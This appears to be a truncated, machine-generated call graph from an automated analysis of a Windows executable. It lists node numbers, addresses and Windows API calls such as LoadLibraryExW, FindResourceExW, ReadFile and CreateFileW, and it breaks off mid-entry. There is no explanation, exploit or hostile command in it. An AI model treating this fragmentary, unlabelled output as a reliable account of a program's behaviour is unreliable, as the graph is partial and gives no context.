c837ac 97410 c84864 61 API calls 97409->97410 97411 c837c0 97410->97411 97412 c87f41 59 API calls 97411->97412 97413 c837cd 97412->97413 97640 c84f3d 97413->97640 97416 cbd3ae 97711 ce97e5 97416->97711 97417 c837ee Mailbox 97664 c881a7 97417->97664 97420 cbd3cd 97423 ca2f95 _free 58 API calls 97420->97423 97425 cbd3da 97423->97425 97427 c84faa 84 API calls 97425->97427 97429 cbd3e3 97427->97429 97433 c83ee2 59 API calls 97429->97433 97430 c87f41 59 API calls 97431 c8381a 97430->97431 97671 c88620 97431->97671 97435 cbd3fe 97433->97435 97434 c8382c Mailbox 97436 c87f41 59 API calls 97434->97436 97437 c83ee2 59 API calls 97435->97437 97438 c83852 97436->97438 97439 cbd41a 97437->97439 97440 c88620 69 API calls 97438->97440 97441 c84864 61 API calls 97439->97441 97443 c83861 Mailbox 97440->97443 97442 cbd43f 97441->97442 97444 c83ee2 59 API calls 97442->97444 97446 c877c7 59 API calls 97443->97446 97445 cbd44b 97444->97445 97447 c881a7 59 API calls 97445->97447 97448 c8387f 97446->97448 97449 cbd459 97447->97449 97675 c83ee2 97448->97675 97451 c83ee2 59 API calls 97449->97451 97453 cbd468 97451->97453 97459 c881a7 59 API calls 97453->97459 97455 c83899 97455->97429 97456 c838a3 97455->97456 97457 ca313d _W_store_winword 60 API calls 97456->97457 97458 c838ae 97457->97458 97458->97435 97460 c838b8 97458->97460 97461 cbd48a 97459->97461 97462 ca313d _W_store_winword 60 API calls 97460->97462 97463 c83ee2 59 API calls 97461->97463 97464 c838c3 97462->97464 97465 cbd497 97463->97465 97464->97439 97466 c838cd 97464->97466 97465->97465 97467 ca313d _W_store_winword 60 API calls 97466->97467 97468 c838d8 97467->97468 97468->97453 97469 c83919 97468->97469 97471 c83ee2 59 API calls 97468->97471 97469->97453 97470 c83926 97469->97470 97691 c8942e 97470->97691 97473 c838fc 97471->97473 97475 c881a7 59 API calls 97473->97475 97477 c8390a 97475->97477 97479 c83ee2 59 API calls 97477->97479 97479->97469 97481 c893ea 59 API calls 97483 c83961 97481->97483 97482 c89040 60 API calls 97482->97483 97483->97481 97483->97482 97484 c83ee2 59 API calls 97483->97484 97485 c839a7 Mailbox 97483->97485 97484->97483 97485->97355 97487 c873f2 __write_nolock 97486->97487 97488 c8740b 97487->97488 97490 cbee4b _memset 97487->97490 97489 c848ae 60 API calls 97488->97489 97491 c87414 97489->97491 97492 cbee67 GetOpenFileNameW 97490->97492 98568 ca09d5 97491->98568 97494 cbeeb6 97492->97494 97495 c87d2c 59 API calls 97494->97495 97497 cbeecb 97495->97497 97497->97497 97499 c87429 98586 c869ca 97499->98586 97503 c90a9a __write_nolock 97502->97503 98891 c86ee0 97503->98891 97505 c90a9f 97506 c83c26 97505->97506 98902 c912fe 89 API calls 97505->98902 97506->97365 97615->97365 97627 c83d50 __write_nolock 97626->97627 97628 c87d2c 59 API calls 97627->97628 97632 c83eb6 Mailbox 97627->97632 97630 c83d82 97628->97630 97639 c83db8 Mailbox 97630->97639 97752 c87b52 97630->97752 97631 c83e89 97631->97632 97633 c87f41 59 API calls 97631->97633 97632->97409 97634 c83eaa 97633->97634 97636 c83f84 59 API calls 97634->97636 97635 c87f41 59 API calls 97635->97639 97636->97632 97637 c87b52 59 API calls 97637->97639 97638 c83f84 59 API calls 97638->97639 97639->97631 97639->97632 97639->97635 97639->97637 97639->97638 97755 c84d13 97640->97755 97645 c84f68 LoadLibraryExW 97765 c84cc8 97645->97765 97646 cbdd0f 97647 c84faa 84 API calls 97646->97647 97649 cbdd16 97647->97649 97651 c84cc8 3 API calls 97649->97651 97653 cbdd1e 97651->97653 97791 c8506b 97653->97791 97654 c84f8f 97654->97653 97655 c84f9b 97654->97655 97656 c84faa 84 API calls 97655->97656 97658 c837e6 97656->97658 97658->97416 97658->97417 97661 cbdd45 97799 c85027 97661->97799 97663 cbdd52 97665 c83801 97664->97665 97666 c881b2 97664->97666 97668 c893ea 97665->97668 98226 c880d7 59 API calls 2 library calls 97666->98226 97669 ca0ff6 Mailbox 59 API calls 97668->97669 97670 c8380d 97669->97670 97670->97430 97672 c8862b 97671->97672 97674 c88652 97672->97674 98227 c88b13 69 API calls Mailbox 97672->98227 97674->97434 97676 c83eec 97675->97676 97677 c83f05 97675->97677 97679 c881a7 59 API calls 97676->97679 97678 c87d2c 59 API calls 97677->97678 97680 c8388b 97678->97680 97679->97680 97681 ca313d 97680->97681 97682 ca3149 97681->97682 97683 ca31be 97681->97683 97690 ca316e 97682->97690 98228 ca8d68 58 API calls __getptd_noexit 97682->98228 98230 ca31d0 60 API calls 3 library calls 97683->98230 97686 ca31cb 97686->97455 97687 ca3155 98229 ca8ff6 9 API calls __wcsicmp_l 97687->98229 97689 ca3160 97689->97455 97690->97455 97692 c89436 97691->97692 97693 ca0ff6 Mailbox 59 API calls 97692->97693 97694 c89444 97693->97694 97695 c83936 97694->97695 98231 c8935c 59 API calls Mailbox 97694->98231 97697 c891b0 97695->97697 98232 c892c0 97697->98232 97699 c891bf 97700 ca0ff6 Mailbox 59 API calls 97699->97700 97701 c83944 97699->97701 97700->97701 97702 c89040 97701->97702 97703 cbf5a5 97702->97703 97710 c89057 97702->97710 97703->97710 98242 c88d3b 59 API calls Mailbox 97703->98242 97705 c89158 97708 ca0ff6 Mailbox 59 API calls 97705->97708 97706 c891a0 98241 c89e9c 60 API calls Mailbox 97706->98241 97709 c8915f 97708->97709 97709->97483 97710->97705 97710->97706 97710->97709 97712 c85045 85 API calls 97711->97712 97713 ce9854 97712->97713 98243 ce99be 97713->98243 97716 c8506b 74 API calls 97717 ce9881 97716->97717 97718 c8506b 74 API calls 97717->97718 97719 ce9891 97718->97719 97720 c8506b 74 API calls 97719->97720 97721 ce98ac 97720->97721 97722 c8506b 74 API calls 97721->97722 97723 ce98c7 97722->97723 97724 c85045 85 API calls 97723->97724 97725 ce98de 97724->97725 97726 ca594c _W_store_winword 58 API calls 97725->97726 97727 ce98e5 97726->97727 97728 ca594c _W_store_winword 58 API calls 97727->97728 97729 ce98ef 97728->97729 97730 c8506b 74 API calls 97729->97730 97731 ce9903 97730->97731 97732 ce9393 GetSystemTimeAsFileTime 97731->97732 97733 ce9916 97732->97733 97734 ce992b 97733->97734 97735 ce9940 97733->97735 97736 ca2f95 _free 58 API calls 97734->97736 97737 ce9946 97735->97737 97738 ce99a5 97735->97738 97740 ce9931 97736->97740 98249 ce8d90 97737->98249 97739 ca2f95 _free 58 API calls 97738->97739 97743 cbd3c1 97739->97743 97744 ca2f95 _free 58 API calls 97740->97744 97743->97420 97746 c84faa 97743->97746 97744->97743 97745 ca2f95 _free 58 API calls 97745->97743 97747 c84fb4 97746->97747 97749 c84fbb 97746->97749 97748 ca55d6 __fcloseall 83 API calls 97747->97748 97748->97749 97750 c84fca 97749->97750 97751 c84fdb FreeLibrary 97749->97751 97750->97420 97751->97750 97753 c87faf 59 API calls 97752->97753 97754 c87b5d 97753->97754 97754->97630 97804 c84d61 97755->97804 97758 c84d61 2 API calls 97761 c84d3a 97758->97761 97759 c84d4a FreeLibrary 97760 c84d53 97759->97760 97762 ca548b 97760->97762 97761->97759 97761->97760 97808 ca54a0 97762->97808 97764 c84f5c 97764->97645 97764->97646 97966 c84d94 97765->97966 97768 c84d08 97772 c84dd0 97768->97772 97769 c84cff FreeLibrary 97769->97768 97770 c84d94 2 API calls 97771 c84ced 97770->97771 97771->97768 97771->97769 97773 ca0ff6 Mailbox 59 API calls 97772->97773 97774 c84de5 97773->97774 97775 c8538e 59 API calls 97774->97775 97776 c84df1 _memmove 97775->97776 97777 c84e2c 97776->97777 97779 c84ee9 97776->97779 97780 c84f21 97776->97780 97778 c85027 69 API calls 97777->97778 97787 c84e35 97778->97787 97970 c84fe9 CreateStreamOnHGlobal 97779->97970 97981 ce9ba5 95 API calls 97780->97981 97783 c8506b 74 API calls 97783->97787 97785 c84ec9 97785->97654 97786 cbdcd0 97788 c85045 85 API calls 97786->97788 97787->97783 97787->97785 97787->97786 97976 c85045 97787->97976 97789 cbdce4 97788->97789 97790 c8506b 74 API calls 97789->97790 97790->97785 97792 c8507d 97791->97792 97793 cbddf6 97791->97793 98005 ca5812 97792->98005 97796 ce9393 98203 ce91e9 97796->98203 97798 ce93a9 97798->97661 97800 cbddb9 97799->97800 97801 c85036 97799->97801 98208 ca5e90 97801->98208 97803 c8503e 97803->97663 97805 c84d2e 97804->97805 97806 c84d6a LoadLibraryA 97804->97806 97805->97758 97805->97761 97806->97805 97807 c84d7b GetProcAddress 97806->97807 97807->97805 97811 ca54ac ___lock_fhandle 97808->97811 97809 ca54bf 97857 ca8d68 58 API calls __getptd_noexit 97809->97857 97811->97809 97813 ca54f0 97811->97813 97812 ca54c4 97858 ca8ff6 9 API calls __wcsicmp_l 97812->97858 97827 cb0738 97813->97827 97816 ca54f5 97817 ca550b 97816->97817 97818 ca54fe 97816->97818 97820 ca5535 97817->97820 97821 ca5515 97817->97821 97859 ca8d68 58 API calls __getptd_noexit 97818->97859 97842 cb0857 97820->97842 97860 ca8d68 58 API calls __getptd_noexit 97821->97860 97823 ca54cf ___lock_fhandle @_EH4_CallFilterFunc@8 97823->97764 97828 cb0744 ___lock_fhandle 97827->97828 97829 ca9e4b __lock 58 API calls 97828->97829 97830 cb0752 97829->97830 97831 cb07cd 97830->97831 97837 ca9ed3 __mtinitlocknum 58 API calls 97830->97837 97840 cb07c6 97830->97840 97865 ca6e8d 59 API calls __lock 97830->97865 97866 ca6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 97830->97866 97867 ca8a5d 58 API calls 2 library calls 97831->97867 97834 cb0843 ___lock_fhandle 97834->97816 97835 cb07d4 97835->97840 97868 caa06b InitializeCriticalSectionAndSpinCount 97835->97868 97837->97830 97839 cb07fa EnterCriticalSection 97839->97840 97862 cb084e 97840->97862 97850 cb0877 __wopenfile 97842->97850 97843 cb0891 97873 ca8d68 58 API calls __getptd_noexit 97843->97873 97845 cb0896 97874 ca8ff6 9 API calls __wcsicmp_l 97845->97874 97847 cb0aaf 97870 cb87f1 97847->97870 97848 ca5540 97861 ca5562 LeaveCriticalSection LeaveCriticalSection __wfsopen 97848->97861 97850->97843 97856 cb0a4c 97850->97856 97875 ca3a0b 60 API calls 2 library calls 97850->97875 97852 cb0a45 97852->97856 97876 ca3a0b 60 API calls 2 library calls 97852->97876 97854 cb0a64 97854->97856 97877 ca3a0b 60 API calls 2 library calls 97854->97877 97856->97843 97856->97847 97857->97812 97858->97823 97859->97823 97860->97823 97861->97823 97869 ca9fb5 LeaveCriticalSection 97862->97869 97864 cb0855 97864->97834 97865->97830 97866->97830 97867->97835 97868->97839 97869->97864 97878 cb7fd5 97870->97878 97872 cb880a 97872->97848 97873->97845 97874->97848 97875->97852 97876->97854 97877->97856 97879 cb7fe1 ___lock_fhandle 97878->97879 97880 cb7ff7 97879->97880 97883 cb802d 97879->97883 97963 ca8d68 58 API calls __getptd_noexit 97880->97963 97882 cb7ffc 97964 ca8ff6 9 API calls __wcsicmp_l 97882->97964 97889 cb809e 97883->97889 97886 cb8006 ___lock_fhandle 97886->97872 97887 cb8049 97965 cb8072 LeaveCriticalSection __unlock_fhandle 97887->97965 97890 cb80be 97889->97890 97891 ca471a __wsopen_nolock 58 API calls 97890->97891 97894 cb80da 97891->97894 97892 ca9006 __invoke_watson 8 API calls 97893 cb87f0 97892->97893 97895 cb7fd5 __wsopen_helper 103 API calls 97893->97895 97896 cb8114 97894->97896 97902 cb8137 97894->97902 97962 cb8211 97894->97962 97897 cb880a 97895->97897 97898 ca8d34 __write 58 API calls 97896->97898 97897->97887 97899 cb8119 97898->97899 97900 ca8d68 __wcsicmp_l 58 API calls 97899->97900 97901 cb8126 97900->97901 97903 ca8ff6 __wcsicmp_l 9 API calls 97901->97903 97904 cb81f5 97902->97904 97911 cb81d3 97902->97911 97905 cb8130 97903->97905 97906 ca8d34 __write 58 API calls 97904->97906 97905->97887 97907 cb81fa 97906->97907 97908 ca8d68 __wcsicmp_l 58 API calls 97907->97908 97909 cb8207 97908->97909 97910 ca8ff6 __wcsicmp_l 9 API calls 97909->97910 97910->97962 97912 cad4d4 __alloc_osfhnd 61 API calls 97911->97912 97913 cb82a1 97912->97913 97914 cb82ab 97913->97914 97915 cb82ce 97913->97915 97917 ca8d34 __write 58 API calls 97914->97917 97916 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97915->97916 97927 cb82f0 97916->97927 97918 cb82b0 97917->97918 97920 ca8d68 __wcsicmp_l 58 API calls 97918->97920 97919 cb836e GetFileType 97921 cb83bb 97919->97921 97922 cb8379 GetLastError 97919->97922 97924 cb82ba 97920->97924 97934 cad76a __set_osfhnd 59 API calls 97921->97934 97926 ca8d47 __dosmaperr 58 API calls 97922->97926 97923 cb833c GetLastError 97928 ca8d47 __dosmaperr 58 API calls 97923->97928 97925 ca8d68 __wcsicmp_l 58 API calls 97924->97925 97925->97905 97929 cb83a0 CloseHandle 97926->97929 97927->97919 97927->97923 97930 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97927->97930 97931 cb8361 97928->97931 97929->97931 97932 cb83ae 97929->97932 97933 cb8331 97930->97933 97936 ca8d68 __wcsicmp_l 58 API calls 97931->97936 97935 ca8d68 __wcsicmp_l 58 API calls 97932->97935 97933->97919 97933->97923 97938 cb83d9 97934->97938 97937 cb83b3 97935->97937 97936->97962 97937->97931 97939 cb8594 97938->97939 97940 cb1b11 __lseeki64_nolock 60 API calls 97938->97940 97959 cb845a 97938->97959 97941 cb8767 CloseHandle 97939->97941 97939->97962 97943 cb8443 97940->97943 97942 cb7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 97941->97942 97944 cb878e 97942->97944 97945 ca8d34 __write 58 API calls 97943->97945 97943->97959 97946 cb87c2 97944->97946 97947 cb8796 GetLastError 97944->97947 97945->97959 97946->97962 97948 ca8d47 __dosmaperr 58 API calls 97947->97948 97950 cb87a2 97948->97950 97949 cb1b11 60 API calls __lseeki64_nolock 97949->97959 97955 cad67d __free_osfhnd 59 API calls 97950->97955 97951 cb0d2d __close_nolock 61 API calls 97951->97959 97952 cb10ab 70 API calls __read_nolock 97952->97959 97953 cb848c 97954 cb99f2 __chsize_nolock 82 API calls 97953->97954 97953->97959 97954->97953 97955->97946 97956 cadac6 __write 78 API calls 97956->97959 97957 cb8611 97958 cb0d2d __close_nolock 61 API calls 97957->97958 97960 cb8618 97958->97960 97959->97939 97959->97949 97959->97951 97959->97952 97959->97953 97959->97956 97959->97957 97961 ca8d68 __wcsicmp_l 58 API calls 97960->97961 97961->97962 97962->97892 97963->97882 97964->97886 97965->97886 97967 c84ce1 97966->97967 97968 c84d9d LoadLibraryA 97966->97968 97967->97770 97967->97771 97968->97967 97969 c84dae GetProcAddress 97968->97969 97969->97967 97971 c85003 FindResourceExW 97970->97971 97975 c85020 97970->97975 97972 cbdd5c LoadResource 97971->97972 97971->97975 97973 cbdd71 SizeofResource 97972->97973 97972->97975 97974 cbdd85 LockResource 97973->97974 97973->97975 97974->97975 97975->97777 97977 c85054 97976->97977 97978 cbddd4 97976->97978 97982 ca5a7d 97977->97982 97980 c85062 97980->97787 97981->97777 97983 ca5a89 ___lock_fhandle 97982->97983 97984 ca5a9b 97983->97984 97986 ca5ac1 97983->97986 97995 ca8d68 58 API calls __getptd_noexit 97984->97995 97997 ca6e4e 97986->97997 97988 ca5aa0 97996 ca8ff6 9 API calls __wcsicmp_l 97988->97996 97989 ca5ac7 98003 ca59ee 83 API calls 5 library calls 97989->98003 97992 ca5ad6 98004 ca5af8 LeaveCriticalSection LeaveCriticalSection __wfsopen 97992->98004 97994 ca5aab ___lock_fhandle 97994->97980 97995->97988 97996->97994 97998 ca6e5e 97997->97998 97999 ca6e80 EnterCriticalSection 97997->97999 97998->97999 98000 ca6e66 97998->98000 98001 ca6e76 97999->98001 98002 ca9e4b __lock 58 API calls 98000->98002 98001->97989 98002->98001 98003->97992 98004->97994 98008 ca582d 98005->98008 98007 c8508e 98007->97796 98009 ca5839 ___lock_fhandle 98008->98009 98010 ca584f _memset 98009->98010 98011 ca587c 98009->98011 98012 ca5874 ___lock_fhandle 98009->98012 98035 ca8d68 58 API calls __getptd_noexit 98010->98035 98013 ca6e4e __lock_file 59 API calls 98011->98013 98012->98007 98014 ca5882 98013->98014 98021 ca564d 98014->98021 98017 ca5869 98036 ca8ff6 9 API calls __wcsicmp_l 98017->98036 98024 ca5668 _memset 98021->98024 98027 ca5683 98021->98027 98022 ca5673 98133 ca8d68 58 API calls __getptd_noexit 98022->98133 98024->98022 98024->98027 98032 ca56c3 98024->98032 98025 ca5678 98134 ca8ff6 9 API calls __wcsicmp_l 98025->98134 98037 ca58b6 LeaveCriticalSection LeaveCriticalSection __wfsopen 98027->98037 98029 ca57d4 _memset 98136 ca8d68 58 API calls __getptd_noexit 98029->98136 98032->98027 98032->98029 98038 ca4916 98032->98038 98045 cb10ab 98032->98045 98113 cb0df7 98032->98113 98135 cb0f18 58 API calls 3 library calls 98032->98135 98035->98017 98036->98012 98037->98012 98039 ca4920 98038->98039 98040 ca4935 98038->98040 98137 ca8d68 58 API calls __getptd_noexit 98039->98137 98040->98032 98042 ca4925 98138 ca8ff6 9 API calls __wcsicmp_l 98042->98138 98044 ca4930 98044->98032 98046 cb10cc 98045->98046 98047 cb10e3 98045->98047 98148 ca8d34 58 API calls __getptd_noexit 98046->98148 98049 cb181b 98047->98049 98054 cb111d 98047->98054 98164 ca8d34 58 API calls __getptd_noexit 98049->98164 98051 cb10d1 98149 ca8d68 58 API calls __getptd_noexit 98051->98149 98052 cb1820 98165 ca8d68 58 API calls __getptd_noexit 98052->98165 98056 cb1125 98054->98056 98062 cb113c 98054->98062 98150 ca8d34 58 API calls __getptd_noexit 98056->98150 98057 cb1131 98166 ca8ff6 9 API calls __wcsicmp_l 98057->98166 98058 cb10d8 98058->98032 98060 cb112a 98151 ca8d68 58 API calls __getptd_noexit 98060->98151 98062->98058 98063 cb1151 98062->98063 98066 cb116b 98062->98066 98067 cb1189 98062->98067 98152 ca8d34 58 API calls __getptd_noexit 98063->98152 98066->98063 98068 cb1176 98066->98068 98153 ca8a5d 58 API calls 2 library calls 98067->98153 98139 cb5ebb 98068->98139 98070 cb1199 98072 cb11bc 98070->98072 98073 cb11a1 98070->98073 98156 cb1b11 60 API calls 3 library calls 98072->98156 98154 ca8d68 58 API calls __getptd_noexit 98073->98154 98074 cb128a 98076 cb1303 ReadFile 98074->98076 98081 cb12a0 GetConsoleMode 98074->98081 98079 cb17e3 GetLastError 98076->98079 98080 cb1325 98076->98080 98078 cb11a6 98155 ca8d34 58 API calls __getptd_noexit 98078->98155 98083 cb17f0 98079->98083 98089 cb12e3 98079->98089 98080->98079 98087 cb12f5 98080->98087 98084 cb1300 98081->98084 98085 cb12b4 98081->98085 98162 ca8d68 58 API calls __getptd_noexit 98083->98162 98084->98076 98085->98084 98088 cb12ba ReadConsoleW 98085->98088 98095 cb15c7 98087->98095 98096 cb12e9 98087->98096 98098 cb135a 98087->98098 98088->98087 98092 cb12dd GetLastError 98088->98092 98089->98096 98157 ca8d47 58 API calls 3 library calls 98089->98157 98091 cb17f5 98163 ca8d34 58 API calls __getptd_noexit 98091->98163 98092->98089 98094 ca2f95 _free 58 API calls 98094->98058 98095->98096 98103 cb16cd ReadFile 98095->98103 98096->98058 98096->98094 98099 cb13c6 ReadFile 98098->98099 98105 cb1447 98098->98105 98100 cb13e7 GetLastError 98099->98100 98109 cb13f1 98099->98109 98100->98109 98101 cb1504 98107 cb14b4 MultiByteToWideChar 98101->98107 98160 cb1b11 60 API calls 3 library calls 98101->98160 98102 cb14f4 98159 ca8d68 58 API calls __getptd_noexit 98102->98159 98104 cb16f0 GetLastError 98103->98104 98112 cb16fe 98103->98112 98104->98112 98105->98096 98105->98101 98105->98102 98105->98107 98107->98092 98107->98096 98109->98098 98158 cb1b11 60 API calls 3 library calls 98109->98158 98112->98095 98161 cb1b11 60 API calls 3 library calls 98112->98161 98114 cb0e02 98113->98114 98118 cb0e17 98113->98118 98200 ca8d68 58 API calls __getptd_noexit 98114->98200 98116 cb0e12 98116->98032 98117 cb0e07 98201 ca8ff6 9 API calls __wcsicmp_l 98117->98201 98118->98116 98120 cb0e4c 98118->98120 98202 cb6234 58 API calls __malloc_crt 98118->98202 98122 ca4916 __stbuf 58 API calls 98120->98122 98123 cb0e60 98122->98123 98167 cb0f97 98123->98167 98125 cb0e67 98125->98116 98126 ca4916 __stbuf 58 API calls 98125->98126 98127 cb0e8a 98126->98127 98127->98116 98128 ca4916 __stbuf 58 API calls 98127->98128 98129 cb0e96 98128->98129 98129->98116 98130 ca4916 __stbuf 58 API calls 98129->98130 98131 cb0ea3 98130->98131 98132 ca4916 __stbuf 58 API calls 98131->98132 98132->98116 98133->98025 98134->98027 98135->98032 98136->98025 98137->98042 98138->98044 98140 cb5ec6 98139->98140 98142 cb5ed3 98139->98142 98141 ca8d68 __wcsicmp_l 58 API calls 98140->98141 98143 cb5ecb 98141->98143 98144 cb5edf 98142->98144 98145 ca8d68 __wcsicmp_l 58 API calls 98142->98145 98143->98074 98144->98074 98146 cb5f00 98145->98146 98147 ca8ff6 __wcsicmp_l 9 API calls 98146->98147 98147->98143 98148->98051 98149->98058 98150->98060 98151->98057 98152->98060 98153->98070 98154->98078 98155->98058 98156->98068 98157->98096 98158->98109 98159->98096 98160->98107 98161->98112 98162->98091 98163->98096 98164->98052 98165->98057 98166->98058 98168 cb0fa3 ___lock_fhandle 98167->98168 98169 cb0fb0 98168->98169 98170 cb0fc7 98168->98170 98172 ca8d34 __write 58 API calls 98169->98172 98171 cb108b 98170->98171 98173 cb0fdb 98170->98173 98174 ca8d34 __write 58 API calls 98171->98174 98175 cb0fb5 98172->98175 98177 cb0ff9 98173->98177 98178 cb1006 98173->98178 98182 cb0ffe 98174->98182 98176 ca8d68 __wcsicmp_l 58 API calls 98175->98176 98195 cb0fbc ___lock_fhandle 98176->98195 98179 ca8d34 __write 58 API calls 98177->98179 98180 cb1028 98178->98180 98181 cb1013 98178->98181 98179->98182 98185 cad446 ___lock_fhandle 59 API calls 98180->98185 98184 ca8d34 __write 58 API calls 98181->98184 98183 ca8d68 __wcsicmp_l 58 API calls 98182->98183 98187 cb1020 98183->98187 98188 cb1018 98184->98188 98186 cb102e 98185->98186 98189 cb1041 98186->98189 98190 cb1054 98186->98190 98193 ca8ff6 __wcsicmp_l 9 API calls 98187->98193 98191 ca8d68 __wcsicmp_l 58 API calls 98188->98191 98192 cb10ab __read_nolock 70 API calls 98189->98192 98194 ca8d68 __wcsicmp_l 58 API calls 98190->98194 98191->98187 98196 cb104d 98192->98196 98193->98195 98197 cb1059 98194->98197 98195->98125 98199 cb1083 __read LeaveCriticalSection 98196->98199 98198 ca8d34 __write 58 API calls 98197->98198 98198->98196 98199->98195 98200->98117 98201->98116 98202->98120 98206 ca543a GetSystemTimeAsFileTime 98203->98206 98205 ce91f8 98205->97798 98207 ca5468 __aulldiv 98206->98207 98207->98205 98209 ca5e9c ___lock_fhandle 98208->98209 98210 ca5eae 98209->98210 98211 ca5ec3 98209->98211 98222 ca8d68 58 API calls __getptd_noexit 98210->98222 98213 ca6e4e __lock_file 59 API calls 98211->98213 98215 ca5ec9 98213->98215 98214 ca5eb3 98223 ca8ff6 9 API calls __wcsicmp_l 98214->98223 98224 ca5b00 67 API calls 6 library calls 98215->98224 98218 ca5ed4 98225 ca5ef4 LeaveCriticalSection LeaveCriticalSection __wfsopen 98218->98225 98219 ca5ebe ___lock_fhandle 98219->97803 98221 ca5ee6 98221->98219 98222->98214 98223->98219 98224->98218 98225->98221 98226->97665 98227->97674 98228->97687 98229->97689 98230->97686 98231->97695 98233 c892c9 Mailbox 98232->98233 98234 cbf5c8 98233->98234 98239 c892d3 98233->98239 98235 ca0ff6 Mailbox 59 API calls 98234->98235 98237 cbf5d4 98235->98237 98236 c892da 98236->97699 98239->98236 98240 c89df0 59 API calls Mailbox 98239->98240 98240->98239 98241->97709 98242->97710 98246 ce99d2 __tzset_nolock _wcscmp 98243->98246 98244 ce9393 GetSystemTimeAsFileTime 98244->98246 98245 c8506b 74 API calls 98245->98246 98246->98244 98246->98245 98247 ce9866 98246->98247 98248 c85045 85 API calls 98246->98248 98247->97716 98247->97743 98248->98246 98250 ce8da9 98249->98250 98251 ce8d9b 98249->98251 98253 ce8dee 98250->98253 98254 ca548b 115 API calls 98250->98254 98264 ce8db2 98250->98264 98252 ca548b 115 API calls 98251->98252 98252->98250 98280 ce901b 98253->98280 98256 ce8dd3 98254->98256 98256->98253 98257 ce8ddc 98256->98257 98261 ca55d6 __fcloseall 83 API calls 98257->98261 98257->98264 98258 ce8e32 98259 ce8e36 98258->98259 98260 ce8e57 98258->98260 98263 ce8e43 98259->98263 98266 ca55d6 __fcloseall 83 API calls 98259->98266 98284 ce8c33 98260->98284 98261->98264 98263->98264 98269 ca55d6 __fcloseall 83 API calls 98263->98269 98264->97745 98266->98263 98267 ce8e85 98293 ce8eb5 98267->98293 98268 ce8e65 98272 ca55d6 __fcloseall 83 API calls 98268->98272 98274 ce8e72 98268->98274 98269->98264 98272->98274 98274->98264 98275 ca55d6 __fcloseall 83 API calls 98274->98275 98275->98264 98277 ce8ea0 98277->98264 98279 ca55d6 __fcloseall 83 API calls 98277->98279 98279->98264 98281 ce9040 98280->98281 98283 ce9029 __tzset_nolock _memmove 98280->98283 98282 ca5812 __fread_nolock 74 API calls 98281->98282 98282->98283 98283->98258 98285 ca594c _W_store_winword 58 API calls 98284->98285 98286 ce8c42 98285->98286 98287 ca594c _W_store_winword 58 API calls 98286->98287 98288 ce8c56 98287->98288 98289 ca594c _W_store_winword 58 API calls 98288->98289 98290 ce8c6a 98289->98290 98291 ce8f97 58 API calls 98290->98291 98292 ce8c7d 98290->98292 98291->98292 98292->98267 98292->98268 98300 ce8eca 98293->98300 98294 ce8f82 98326 ce91bf 98294->98326 98295 ce8c8f 74 API calls 98295->98300 98297 ce8e8c 98301 ce8f97 98297->98301 98300->98294 98300->98295 98300->98297 98322 ce909c 98300->98322 98330 ce8d2b 74 API calls 98300->98330 98302 ce8faa 98301->98302 98303 ce8fa4 98301->98303 98305 ce8fbb 98302->98305 98306 ca2f95 _free 58 API calls 98302->98306 98304 ca2f95 _free 58 API calls 98303->98304 98304->98302 98307 ca2f95 _free 58 API calls 98305->98307 98308 ce8e93 98305->98308 98306->98305 98307->98308 98308->98277 98309 ca55d6 98308->98309 98310 ca55e2 ___lock_fhandle 98309->98310 98311 ca560e 98310->98311 98312 ca55f6 98310->98312 98315 ca5606 ___lock_fhandle 98311->98315 98316 ca6e4e __lock_file 59 API calls 98311->98316 98379 ca8d68 58 API calls __getptd_noexit 98312->98379 98314 ca55fb 98380 ca8ff6 9 API calls __wcsicmp_l 98314->98380 98315->98277 98318 ca5620 98316->98318 98363 ca556a 98318->98363 98324 ce90ab 98322->98324 98325 ce90eb 98322->98325 98324->98300 98325->98324 98331 ce9172 98325->98331 98327 ce91cc 98326->98327 98328 ce91dd 98326->98328 98329 ca4a93 80 API calls 98327->98329 98328->98297 98329->98328 98330->98300 98332 ce919e 98331->98332 98333 ce91af 98331->98333 98335 ca4a93 98332->98335 98333->98325 98336 ca4a9f ___lock_fhandle 98335->98336 98337 ca4abd 98336->98337 98338 ca4ad5 98336->98338 98347 ca4acd ___lock_fhandle 98336->98347 98360 ca8d68 58 API calls __getptd_noexit 98337->98360 98339 ca6e4e __lock_file 59 API calls 98338->98339 98341 ca4adb 98339->98341 98348 ca493a 98341->98348 98342 ca4ac2 98361 ca8ff6 9 API calls __wcsicmp_l 98342->98361 98347->98333 98351 ca4949 98348->98351 98354 ca4967 98348->98354 98349 ca4957 98350 ca8d68 __wcsicmp_l 58 API calls 98349->98350 98352 ca495c 98350->98352 98351->98349 98351->98354 98357 ca4981 _memmove 98351->98357 98353 ca8ff6 __wcsicmp_l 9 API calls 98352->98353 98353->98354 98362 ca4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 98354->98362 98355 cab05e __flsbuf 78 API calls 98355->98357 98356 ca4c6d __flush 78 API calls 98356->98357 98357->98354 98357->98355 98357->98356 98358 ca4916 __stbuf 58 API calls 98357->98358 98359 cadac6 __write 78 API calls 98357->98359 98358->98357 98359->98357 98360->98342 98361->98347 98362->98347 98364 ca5579 98363->98364 98365 ca558d 98363->98365 98418 ca8d68 58 API calls __getptd_noexit 98364->98418 98371 ca5589 98365->98371 98382 ca4c6d 98365->98382 98367 ca557e 98419 ca8ff6 9 API calls __wcsicmp_l 98367->98419 98381 ca5645 LeaveCriticalSection LeaveCriticalSection __wfsopen 98371->98381 98374 ca4916 __stbuf 58 API calls 98375 ca55a7 98374->98375 98392 cb0c52 98375->98392 98377 ca55ad 98377->98371 98378 ca2f95 _free 58 API calls 98377->98378 98378->98371 98379->98314 98380->98315 98381->98315 98383 ca4c80 98382->98383 98387 ca4ca4 98382->98387 98384 ca4916 __stbuf 58 API calls 98383->98384 98383->98387 98385 ca4c9d 98384->98385 98420 cadac6 98385->98420 98388 cb0dc7 98387->98388 98389 ca55a1 98388->98389 98390 cb0dd4 98388->98390 98389->98374 98390->98389 98391 ca2f95 _free 58 API calls 98390->98391 98391->98389 98393 cb0c5e ___lock_fhandle 98392->98393 98394 cb0c6b 98393->98394 98395 cb0c82 98393->98395 98545 ca8d34 58 API calls __getptd_noexit 98394->98545 98396 cb0d0d 98395->98396 98398 cb0c92 98395->98398 98550 ca8d34 58 API calls __getptd_noexit 98396->98550 98401 cb0cba 98398->98401 98402 cb0cb0 98398->98402 98400 cb0c70 98546 ca8d68 58 API calls __getptd_noexit 98400->98546 98406 cad446 